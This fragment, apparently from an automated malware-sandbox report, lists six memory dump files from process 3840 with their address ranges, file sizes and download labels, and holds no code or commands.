memory/3840-6705-0x00000000078C0000-0x0000000007E64000-memory.dmp

Filesize
5.6MB

Download
memory/3840-6706-0x0000000007380000-0x00000000073E6000-memory.dmp

Filesize
408KB

Download
memory/3840-6707-0x0000000007590000-0x0000000007622000-memory.dmp

Filesize
584KB

Download
memory/3840-6708-0x0000000007890000-0x000000000789A000-memory.dmp

Filesize
40KB

Download
memory/3840-6703-0x0000000006F80000-0x0000000006F92000-memory.dmp

Filesize
72KB

Download
memory/3840-6702-0x0000000003940000-0x0000000003955000-memory.dmp

Filesize
84KB

Download